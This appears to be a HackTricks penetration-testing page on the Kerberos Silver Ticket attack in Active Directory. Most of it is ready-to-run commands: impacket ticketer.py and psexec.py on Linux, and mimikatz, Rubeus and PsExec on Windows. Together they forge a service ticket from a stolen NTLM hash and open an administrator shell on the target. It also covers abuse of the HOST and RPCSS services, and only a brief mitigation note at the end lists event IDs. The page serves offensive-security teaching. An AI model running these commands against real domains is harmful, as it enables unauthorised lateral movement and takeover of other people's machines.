hacktricks/windows/active-directory-methodology/silver-ticket.md

2.8 KiB

Silver Ticket

Silver ticket

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned like the **PC account hash**. Thus, it is possible to gain access to that service by forging a custom TGS as any user.

In this case, the NTLM hash of a computer account which is kind of a user account in AD is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default.

It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys AES128 and AES256. To know how to generate an AES key read: section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1.

{% code title="Linux" %}

python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park  stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache 
python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass

{% endcode %}

In Windows, Mimikatz can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec.

{% code title="Windows" %}

#Create the ticket
mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"
#Inject in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi"
.\Rubeus.exe ptt /ticket:ticket.kirbi
#Obtain a shell
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

{% endcode %}

The CIFS service is the one that allows you to access the file system of the victim. You can find other services here: https://adsecurity.org/?page_id=183. For example, you can use the HOST service to create a schtask in a computer. Then you can check if this has worked trying to list the tasks of the victim: schtasks /S <hostname> or you can use the HOST and RPCSS service to execute WMI queries in a computer, test it doing: Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>

Mitigation

Silver ticket events ID more stealth than golden ticket:

  • 4624: Account Logon
  • 4634: Account Logoff
  • 4672: Admin Logon

****More information about Silver Tickets in ired.team****